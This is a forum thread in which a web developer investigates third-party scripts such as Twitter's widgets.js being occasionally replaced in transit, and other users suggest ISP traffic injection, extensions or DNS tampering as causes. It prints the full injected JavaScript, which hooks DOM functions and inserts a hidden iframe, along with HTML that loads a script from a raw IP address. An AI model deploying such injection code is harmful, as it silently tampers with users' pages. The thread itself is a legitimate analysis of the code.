Answer the question
In order to leave comments, you need to log in
A
A
astler2015-08-22 18:12:24
astler, 2015-08-22 18:12:24
Where does the left JavaScript - JetToolbar.js - come from on websites?
In general, I sit, I don’t touch anyone, I make a website. And then I see that errors constantly appear in the Chrome Console. I'm going to look and see what I see. Periodically, the browser requests a page from my site with the address /gA0LNt_i5b9Q.html. Interesting, I didn't post those links anywhere. I see that the request for this page comes from a script. I open it in the script - and I see there is not at all the code that should be there. I decided that viruses had started somewhere here, and began my mini-research. In general, after all the checks, it turned out that everything was clean for me, both on the web server and on all computers. In addition, it turned out that scripts are being replaced not only on my site, which I develop, but also on other sites. It's just that with some degree of probability (say less than 1%), instead of the original script, a script with different content is loaded (here, for example, what was loaded instead of the script platform.twitter.com/widgets.js on one site):
(function(a, b, c) {
var d = "script",
e = "src",
f = b.location,
g = function(a) {
return b.getElementsByTagName(a)
}, h = g(d),
i = h.length;
if ("loading" == b.readyState & i > 0 & c == h[h.length - 1].src && b.write('<script type="text/javascript" src="' + c + '?r=1"></script>'), g(d).length == i) {
var j = -1,
k = b.createElement(d);
k.src = c + "?r=2", k.type = "text/javascript";
for (j in h) {
if ("string" == typeof h[j].src && h[j].src == c) {
var l = h[j].nextSibling;
l ? h[j].parentNode.insertBefore(k, l) : h[j].parentNode.appendChild(k)
}
break
}
k.parentNode || g("head")[0].appendChild(k)
}
if (!a.jTB & a == a.top) {
var m = b.write;
b.write = function() {
var a = m.apply(this, arguments);
return a
};
var n = b.createElement;
b.createElement = function() {
var a = arguments,
b = n.apply(this, a);
try {
if (b.getAttribute) {
var c = b.setAttribute;
1 == a.length && a[0].toLowerCase() == d && (Object.defineProperty && Object.defineProperty(b, e, {
set: function() {
this.setAttribute(e, arguments[0])
},
get: function() {
return b.getAttribute(e)
}
}), b.setAttribute = function() {
var a = arguments;
return 2 == a.length && a[0] == e && a[1].indexOf(".js") == a[1].length - 3 && (a = [e, a[1] + "?r=4"]), c.apply(this, a)
})
}
} catch (f) {}
return b
};
var o = function() {
var a = g("body")[0];
if (a) {
var c = b.createElement("iframe");
c.src = f.protocol + "//" + f.hostname + (f.port ? ":" + f.port : "") + "/gA0LNt_i5b9Q.html", c.name = document.domain;
var d = c.style,
e = b.createElement("div"),
h = e.style;
h.position = "fixed", d.overflow = "hidden", d.border = h.left = h.bottom = 0, d.width = d.height = h.width = h.height = "1px", e.appendChild(c), a.appendChild(e)
} else setTimeout(o, 50)
};
o(), a.jTB = 1
}
})(window, document, "http://platform.twitter.com/widgets.js");In general, instead of widgets.js (in this case, although different scripts are changed each time), a script is loaded that adds an iframe and loads the script we already need. Because there is no such page on the server - /gA0LNt_i5b9Q.html, then an error message will appear in the browser console.
Further - more interesting. It turned out that sometimes this link still works (rarely), and platform.twitter.com/gA0LNt_i5b9Q.html gives us such an html code (again, the server may be different, it all depends on which script was replaced, it does not change page only - /gA0LNt_i5b9Q.html):
<html>
<head>
<script type='text/javascript'>
if (window.name != document.domain) {
document.domain = window.name;
}
</script>
<script src = 'http://86.57.252.165:8082/jet.toolbar/jet.toolbar.js?ver=latest&jet-toolbar-cmds=ifrun:1' type='text/javascript'></script>
</head>
<body></body>
</html>Well, then off we go, that jet.toolbar.js script pulls a bunch of scripts along with it.
The question is - what is this jet.toolbar.js and how to deal with it? And the cat is to blame? This is my ISP having so much fun, if I understand correctly?
PS I googled JetToolbar - I came across such a presentation ciscoconnect.ru/en/system/files/jettoolbar_i_subsc...
5 answer(s)
@markety
@Xius
@index0h
@Mystray
M
Markety, 2015-08-24 @markety
On one of my sites in the logs I see the same thing. Requests to the gA0LNt_i5b9Q.html page come from the Beltelecom network. I compare with this information - 42.tut.by/450791
Perhaps this is the answer.
X
Xius, 2016-07-29 @Xius
Thank you for posting your investigation! Today I looked at the web browser in the metric and also saw that one user with a Yandex browser was hitting the /gA0LNt_i5b9Q.html page almost after every transition.
I couldn't think of anything better than how to create such a page on the site with a warning text for the user gadgetbox.kz/ga0lnt_i5b9q
Perhaps the issue is with the provider.
I
index0h, 2015-08-22 @index0h
It looks like a traffic substitution, or the work of browser extensions. Recently I saw a browser extension trying to sell itself as a protection for Kaspersky, but in fact - it turned off adblock + mixed its shit into the DOM.
M
Mystray, 2015-08-23 @Mystray
Check the DNS settings on the router, if one is used. If everything is fine there, try, as mentioned above, to change the provider.
Similar questions
A
N
V
D
A
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question